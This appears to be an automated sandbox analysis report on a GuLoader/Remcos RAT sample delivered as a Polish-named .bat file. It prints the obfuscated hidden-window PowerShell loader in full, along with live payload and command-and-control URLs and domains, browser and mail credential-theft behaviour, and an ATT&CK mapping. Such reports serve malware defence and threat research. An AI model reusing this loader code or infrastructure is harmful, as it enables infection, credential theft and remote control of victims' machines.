                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#paremernes duplicature udvejer dataservicens treasury ostleress uninterdicted #>;$cryoscopy='grusgrav';<#dubbe bantustamme nyvurderende tripudiate mitigated #>; function dark($misligholdelsers){if ($host.debuggerenabled) {$differentieringens++;}$sadomasochism=$cariss+$misligholdelsers.'length'-$differentieringens; for( $unacute27=4;$unacute27 -lt $sadomasochism;$unacute27+=5){$unaccommodable=$unacute27;$enforth+=$misligholdelsers[$unacute27];$cutireaction='blomstringstiderne';}$enforth;}function nondeclaratively($budcyklen){ . ($dolomitternes) ($budcyklen);}$skrllede=dark 'staimc clo eftzf stiragelri elstyra ogn/thra ';$stupiditetens=dark 'kryptsvenl presu ne1 nde2unav ';$unpliantness=' lus[mashnfldee my t fal.anthsd coehistrru dvs stiengrcbefaetilgptorto bogisangnopsptma.imnonfa awnnskruasamlglibeezygor lit]vaga:sovj:alecsmyogecuphcp esugennrdisci c atskjuy basp iggrv.rgo ga tgoniocam.c.eclotrevlsvrm= ven$net sendetconcu.seuptomairovedgoveifagkt unme tratgastefravn r.ms unp ';$skrllede+=dark 'regi5majo.mau.0 opd simo(tip wter if lgnchrodbusho priw .orsunsh j,nsn moltbuff fora1side0fod ..ast0ni n;vilj anfgw kreieftenmaka6svir4unpr;str, parxline6 uns4.nde;beru beedrafkavgoat:gene1 un 3sang1 up.miss0fo m) mor aandgdiskeree cturbkmorpo dta/nive2 res0drop1slad0skuf0arch1k,nd0.dst1 ri tetfaeroi conrstofe ,lifenteo ,dkxtreu/a,te1v ra3cod 1 hdr.fo r0etym ';$signatarmagters=dark ' reu fyrsbivoe posrile - alasneag wayeisodn j mtge e ';$beskftigelsesinteressen=dark 'hre hs pettraft nkp ka,sloai:inex/ co /downeconivyn leundesintaeverdc tmrrcaroeolivtprin.m,timgou acyl /lokam,adeigarasrecefautoo ylbrforlsl.rat,orpa pina po e.egil slfs wifekbenr retnreckerejs. autp,heesgroum,itr ';$unacute27mpastoed=dark 'volu> nyt ';$dolomitternes=dark 'archiconseforbx skr ';$nyhedsbureauernes='forfatningsdomstol';$cynography='\satisfiable.ins';nondeclaratively (dark 'hort$amphgsyrilla gobo abvaa ash nl und:vellsfdsektestimasslbys.s we,msteristilsstokshan est erguld1reva8 rov=rumi$ fleegiarnunsuvcons: efeat rbpmicrph lkdspriaantitforsacoli+unfo$ges.cfo.lykam nsta oop,jgfallr bria .enptrashbarkyhyae ');nondeclaratively (dark ' ,ns$lavtgmonsl vinocharb c aacatcl d,n:sc,pksambl regal ngr ymplspriapsy gimmotba.kehortsgdni= par$savsbmicrediscsbrackmel fpyr ttilbi,oncgbe oe timlenchsbuckebrnesexosigasen,akltblgee ranr r,sechrosunpesrek,e eu ndise. daysfolkpredelin bipucktmed (rage$picaumetanclamaudstcpastua tetaeroe kse2 er7gt,emla,dp.tagavaans ikotbarbopulseungrdsamf)himm ');nondeclaratively (dark $unpliantness);$beskftigelsesinteressen=$klarlagtes[0];$kakar=(dark 'tr.i$tut g denlr.adovrdibcru awordls.de:.pkagskadrove,uoronnarkideft v edgoopfal.rendfdese ,ron omgsputr= bednslamed mpw rad-vapoofeatb intjp lieka,scremsthumi fodbs hiy ad,ssurrts.ioeskosmtils. aefnopbyewhartlykk. rebw a.se albbcommcf rllan,eisla,esam n pietseku ');nondeclaratively ($kakar);nondeclaratively (da
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#paremernes duplicature udvejer dataservicens treasury ostleress uninterdicted #>;$cryoscopy='grusgrav';<#dubbe bantustamme nyvurderende tripudiate mitigated #>; function dark($misligholdelsers){if ($host.debuggerenabled) {$differentieringens++;}$sadomasochism=$cariss+$misligholdelsers.'length'-$differentieringens; for( $unacute27=4;$unacute27 -lt $sadomasochism;$unacute27+=5){$unaccommodable=$unacute27;$enforth+=$misligholdelsers[$unacute27];$cutireaction='blomstringstiderne';}$enforth;}function nondeclaratively($budcyklen){ . ($dolomitternes) ($budcyklen);}$skrllede=dark 'staimc clo eftzf stiragelri elstyra ogn/thra ';$stupiditetens=dark 'kryptsvenl presu ne1 nde2unav ';$unpliantness=' lus[mashnfldee my t fal.anthsd coehistrru dvs stiengrcbefaetilgptorto bogisangnopsptma.imnonfa awnnskruasamlglibeezygor lit]vaga:sovj:alecsmyogecuphcp esugennrdisci c atskjuy basp iggrv.rgo ga tgoniocam.c.eclotrevlsvrm= ven$net sendetconcu.seuptomairovedgoveifagkt unme tratgastefravn r.ms unp ';$skrllede+=dark 'regi5majo.mau.0 opd simo(tip wter if lgnchrodbusho priw .orsunsh j,nsn moltbuff fora1side0fod ..ast0ni n;vilj anfgw kreieftenmaka6svir4unpr;str, parxline6 uns4.nde;beru beedrafkavgoat:gene1 un 3sang1 up.miss0fo m) mor aandgdiskeree cturbkmorpo dta/nive2 res0drop1slad0skuf0arch1k,nd0.dst1 ri tetfaeroi conrstofe ,lifenteo ,dkxtreu/a,te1v ra3cod 1 hdr.fo r0etym ';$signatarmagters=dark ' reu fyrsbivoe posrile - alasneag wayeisodn j mtge e ';$beskftigelsesinteressen=dark 'hre hs pettraft nkp ka,sloai:inex/ co /downeconivyn leundesintaeverdc tmrrcaroeolivtprin.m,timgou acyl /lokam,adeigarasrecefautoo ylbrforlsl.rat,orpa pina po e.egil slfs wifekbenr retnreckerejs. autp,heesgroum,itr ';$unacute27mpastoed=dark 'volu> nyt ';$dolomitternes=dark 'archiconseforbx skr ';$nyhedsbureauernes='forfatningsdomstol';$cynography='\satisfiable.ins';nondeclaratively (dark 'hort$amphgsyrilla gobo abvaa ash nl und:vellsfdsektestimasslbys.s we,msteristilsstokshan est erguld1reva8 rov=rumi$ fleegiarnunsuvcons: efeat rbpmicrph lkdspriaantitforsacoli+unfo$ges.cfo.lykam nsta oop,jgfallr bria .enptrashbarkyhyae ');nondeclaratively (dark ' ,ns$lavtgmonsl vinocharb c aacatcl d,n:sc,pksambl regal ngr ymplspriapsy gimmotba.kehortsgdni= par$savsbmicrediscsbrackmel fpyr ttilbi,oncgbe oe timlenchsbuckebrnesexosigasen,akltblgee ranr r,sechrosunpesrek,e eu ndise. daysfolkpredelin bipucktmed (rage$picaumetanclamaudstcpastua tetaeroe kse2 er7gt,emla,dp.tagavaans ikotbarbopulseungrdsamf)himm ');nondeclaratively (dark $unpliantness);$beskftigelsesinteressen=$klarlagtes[0];$kakar=(dark 'tr.i$tut g denlr.adovrdibcru awordls.de:.pkagskadrove,uoronnarkideft v edgoopfal.rendfdese ,ron omgsputr= bednslamed mpw rad-vapoofeatb intjp lieka,scremsthumi fodbs hiy ad,ssurrts.ioeskosmtils. aefnopbyewhartlykk. rebw a.se albbcommcf rllan,eisla,esam n pietseku ');nondeclaratively ($kak
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#paremernes duplicature udvejer dataservicens treasury ostleress uninterdicted #>;$cryoscopy='grusgrav';<#dubbe bantustamme nyvurderende tripudiate mitigated #>; function dark($misligholdelsers){if ($host.debuggerenabled) {$differentieringens++;}$sadomasochism=$cariss+$misligholdelsers.'length'-$differentieringens; for( $unacute27=4;$unacute27 -lt $sadomasochism;$unacute27+=5){$unaccommodable=$unacute27;$enforth+=$misligholdelsers[$unacute27];$cutireaction='blomstringstiderne';}$enforth;}function nondeclaratively($budcyklen){ . ($dolomitternes) ($budcyklen);}$skrllede=dark 'staimc clo eftzf stiragelri elstyra ogn/thra ';$stupiditetens=dark 'kryptsvenl presu ne1 nde2unav ';$unpliantness=' lus[mashnfldee my t fal.anthsd coehistrru dvs stiengrcbefaetilgptorto bogisangnopsptma.imnonfa awnnskruasamlglibeezygor lit]vaga:sovj:alecsmyogecuphcp esugennrdisci c atskjuy basp iggrv.rgo ga tgoniocam.c.eclotrevlsvrm= ven$net sendetconcu.seuptomairovedgoveifagkt unme tratgastefravn r.ms unp ';$skrllede+=dark 'regi5majo.mau.0 opd simo(tip wter if lgnchrodbusho priw .orsunsh j,nsn moltbuff fora1side0fod ..ast0ni n;vilj anfgw kreieftenmaka6svir4unpr;str, parxline6 uns4.nde;beru beedrafkavgoat:gene1 un 3sang1 up.miss0fo m) mor aandgdiskeree cturbkmorpo dta/nive2 res0drop1slad0skuf0arch1k,nd0.dst1 ri tetfaeroi conrstofe ,lifenteo ,dkxtreu/a,te1v ra3cod 1 hdr.fo r0etym ';$signatarmagters=dark ' reu fyrsbivoe posrile - alasneag wayeisodn j mtge e ';$beskftigelsesinteressen=dark 'hre hs pettraft nkp ka,sloai:inex/ co /downeconivyn leundesintaeverdc tmrrcaroeolivtprin.m,timgou acyl /lokam,adeigarasrecefautoo ylbrforlsl.rat,orpa pina po e.egil slfs wifekbenr retnreckerejs. autp,heesgroum,itr ';$unacute27mpastoed=dark 'volu> nyt ';$dolomitternes=dark 'archiconseforbx skr ';$nyhedsbureauernes='forfatningsdomstol';$cynography='\satisfiable.ins';nondeclaratively (dark 'hort$amphgsyrilla gobo abvaa ash nl und:vellsfdsektestimasslbys.s we,msteristilsstokshan est erguld1reva8 rov=rumi$ fleegiarnunsuvcons: efeat rbpmicrph lkdspriaantitforsacoli+unfo$ges.cfo.lykam nsta oop,jgfallr bria .enptrashbarkyhyae ');nondeclaratively (dark ' ,ns$lavtgmonsl vinocharb c aacatcl d,n:sc,pksambl regal ngr ymplspriapsy gimmotba.kehortsgdni= par$savsbmicrediscsbrackmel fpyr ttilbi,oncgbe oe timlenchsbuckebrnesexosigasen,akltblgee ranr r,sechrosunpesrek,e eu ndise. daysfolkpredelin bipucktmed (rage$picaumetanclamaudstcpastua tetaeroe kse2 er7gt,emla,dp.tagavaans ikotbarbopulseungrdsamf)himm ');nondeclaratively (dark $unpliantness);$beskftigelsesinteressen=$klarlagtes[0];$kakar=(dark 'tr.i$tut g denlr.adovrdibcru awordls.de:.pkagskadrove,uoronnarkideft v edgoopfal.rendfdese ,ron omgsputr= bednslamed mpw rad-vapoofeatb intjp lieka,scremsthumi fodbs hiy ad,ssurrts.ioeskosmtils. aefnopbyewhartlykk. rebw a.se albbcommcf rllan,eisla,esam n pietseku ');nondeclaratively ($kakar);nondeclaratively (daJump to behavior
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,18_2_0041881C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041739B GetVersionExW,18_2_0041739B

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword19_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword19_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword19_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2032, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ASN50UJump to behavior
                Source: Yara matchFile source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                2
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                412
                Process Injection
                1
                Software Packing
                1
                Credentials in Registry
                3
                File and Directory Discovery
                SMB/Windows Admin Shares11
                Input Capture
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS17
                System Information Discovery
                Distributed Component Object Model2
                Clipboard Data
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets121
                Security Software Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture113
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543699 Sample: Lista produkt#U00f3w POL565... Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 42 updated212.duckdns.org 2->42 44 odinga.duckdns.org 2->44 46 3 other IPs or domains 2->46 66 Suricata IDS alerts for network traffic 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Yara detected GuLoader 2->70 74 6 other signatures 2->74 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 72 Uses dynamic DNS services 44->72 process4 signatures5 76 Early bird code injection technique detected 9->76 78 Writes to foreign memory regions 9->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 9->80 82 Queues an APC in another process (thread injection) 9->82 14 msiexec.exe 5 16 9->14         started        19 conhost.exe 9->19         started        84 Suspicious powershell command line found 12->84 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 48 updated212.duckdns.org 143.244.46.150, 51525, 52090, 52104 COGENT-174US United States 14->48 50 plieltd.top 104.21.56.189, 443, 52023 CLOUDFLARENETUS United States 14->50 52 geoplugin.net 178.237.33.50, 52116, 80 ATOM86-ASATOM86NL Netherlands 14->52 40 C:\ProgramData\remcos\logs.dat, data 14->40 dropped 56 Detected Remcos RAT 14->56 58 Tries to steal Mail credentials (via file registry) 14->58 60 Maps a DLL or memory area into another process 14->60 64 2 other signatures 14->64 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 4 other processes 14->34 54 evesecret.ma 37.230.62.86, 443, 49710, 52002 BRIGHTBOX-ASGB United Kingdom 21->54 62 Found suspicious powershell code related to unpacking or dynamic code loading 21->62 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 86 Tries to harvest and steal browser information (history, passwords, etc) 25->86 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Lista produkt#U00f3w POL56583753Sarchmentdoc.bat3%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.imvu.comr0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://crl.micro0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                odinga.duckdns.org
                143.244.46.150
                truetrue
                  unknown
                  plieltd.top
                  104.21.56.189
                  truefalse
                    unknown
                    updated212.duckdns.org
                    143.244.46.150
                    truetrue
                      unknown
                      geoplugin.net
                      178.237.33.50
                      truefalse
                        unknown
                        evesecret.ma
                        37.230.62.86
                        truefalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://evesecret.ma/eYyaWC130.binfalse
                            unknown
                            https://evesecret.ma/Misforstaaelserne.psmfalse
                              unknown
                              https://plieltd.top/eYyaWC130.binfalse
                                unknown
                                http://geoplugin.net/json.gpfalse
                                • URL Reputation: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.imvu.comrmsiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aefd.nelreports.net/api/report?cat=bingthbhv2369.tmp.18.drfalse
                                  unknown
                                  http://geoplugin.net/json.gp)msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://plieltd.top/#nmsiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://geoplugin.net/json.gpeiXmsiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
